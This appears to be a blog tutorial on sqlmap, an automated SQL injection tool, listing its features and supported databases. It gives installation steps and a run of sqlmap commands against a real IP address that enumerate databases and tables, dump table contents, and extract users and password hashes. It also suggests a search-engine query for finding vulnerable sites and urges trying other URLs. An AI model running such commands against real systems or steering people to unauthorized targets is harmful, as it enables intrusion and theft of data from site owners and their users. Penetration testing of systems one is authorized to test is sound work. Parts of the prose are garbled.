SQLMAP

For all developers, programmers, and ethical hacking, it is essential always to protect your data and the data that is hosted on the network  This is why SQL is a tool developed in python to perform SQL code injection automatically. Its objective is to detect and take advantage of SQL injection vulnerabilities in web applications, This tool has a powerful detection engine, various functions for the best penetration tester and a wide range of switches that go from the fingerprinting of the database, on obtaining data from the database, to the access to the underlying file system and the execution of commands in the operating system through external means — band connections.

SQLMAP manages to support various engines in databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, Firebird, Sybase, SAP MaxDB.

within the main features of this tool can be found as excellent support of six SQL injection techniques: blind-based Boolean, blind based on time, based on errors, UNION query, stacked and out-of-band queries

This is a tool with many functionalities and features that allow the user the possibility to also support for the download and upload of the system files with files underlying the database server when the MySQL database software, PostgreSQL or Microsoft SQL Server.

Within the process of running SQLMA to find a website with genetic vulnerability, there is a straightforward way, and it is merely to place in the search engine of your choice as google the following commands section.php? Id = resulting in all the fragile web access.

How is it used?

Installation

sudo apt-get install sqlmap

or

pip install sqlmap

sqlmap

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -b

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db

other tests

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
I recommend you to test with other URLs and analyze the results.
Resources:

http://sqlmap.org/

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Avatar

This post was written by Ruben Dario Caravajal Herrera